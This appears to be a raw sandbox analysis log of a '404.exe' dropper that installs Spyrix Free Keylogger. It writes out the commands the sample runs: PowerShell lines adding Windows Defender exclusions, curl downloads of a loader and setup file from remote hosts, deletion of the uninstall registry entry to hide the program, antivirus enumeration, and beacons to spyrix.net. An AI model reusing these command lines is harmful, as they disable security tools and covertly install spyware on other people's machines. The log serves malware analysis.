            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
            Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
            Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
            Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user~1\AppData\Local\Temp\nse"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1884,i,11941437958654227887,11152764312835152294,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find "spm"
            Source: C:\Users\user\Desktop\404.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\l" https://cdnbaynet.com/loader/link.php?prg_id=sfkJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp "C:\Users\user~1\AppData\Local\Temp\is-TGL7N.tmp\404.tmp" /SL5="$303F4,32862490,227328,C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\pswd.cmdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /FJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /fJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '404.*'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user~1\AppData\Local\Temp\nse"
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find "spm"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1884,i,11941437958654227887,11152764312835152294,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\404.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: uiautomationcore.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\404.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
